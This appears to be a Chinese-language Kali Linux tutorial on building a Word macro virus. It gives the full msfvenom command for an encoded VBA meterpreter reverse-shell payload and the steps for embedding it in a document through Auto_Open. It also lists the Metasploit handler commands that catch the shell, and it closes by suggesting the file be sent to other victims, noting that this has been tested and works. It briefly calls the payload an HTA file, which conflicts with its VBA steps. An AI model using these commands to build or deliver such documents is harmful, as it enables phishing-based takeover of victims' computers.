Kali渗透测试:使用宏病毒进行渗透攻击
VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。
构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或直接删除其他文件等。Word宏和其他样式存储在模版DOT文件中, 因此总是把Word文件转成模版,再将其存储为宏。
实 验 环 境
攻击机:Linux kali 5.10.0 IP: 192.168.68.125
靶机:IE11-Win81
操 作 步 骤
1. 使用msfvenom生成VBA被控端
在Kali Linux中使用msfvenom命令生成一个VBA类型的被控端,输入如下命令:
┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
该被控端可以分为两个部分。第一个部分是包括Auto_Open在内的几个函数,如下图所示:
第二部分是一些字符形式的攻击载荷,如下图所示:
2. 使用Word制作宏文件
使用Word将上图所示 两个部分制作成可以使用的宏文件。进入装有Office的Windows系统的靶机,然后打开Word(本人使用的是2007版),单击“开发工具”,接着在工具栏单击“宏”,就会弹出一个“宏”对话框,如下图所示:
起一个宏名,然后单击“创建”按钮,打开宏编辑界面,将我们在Kali 中生成的第一部分,也就是包括Auto_Open在内的几个函数复制到Normal-NewMacros中,覆盖原来的内容。如下图所示:
然后在工具栏上单击编辑图标,返回到Word操作界面,如下图所示:
在Word操作界面中,粘贴在KaliLinux中生成的第二部分,也就是字符形式的攻击载荷部分,如下图所示:
完成之后,将该木马文件保存,如下图所示:
3. 在Kali中启动metasploit
进入metasploit,启动和设置payload并执行,命令如下:
msf6 > use exploit/multi/handler
.....
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
.....
msf6 exploit(multi/handler) > set lhost 192.168.68.125
.....
msf6 exploit(multi/handler) > set lport 4444
.....
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.68.125:4444
4. 执行宏病毒文件
现在在靶机Win8中直接双击桌面上这个生成的木马文件(上图红框所示),在Kali中可以看到获得控制权限。如下图所示:
在会话界面,执行pwd命令,dir命令 ,结果如下图所示:
如果把宏病毒文件发给其他受害者,当受害者打开这个文件,里面的恶意HTA文件就会执行。在Kali中同样会得到控制权。在此不再赘述,本人已经亲测有效。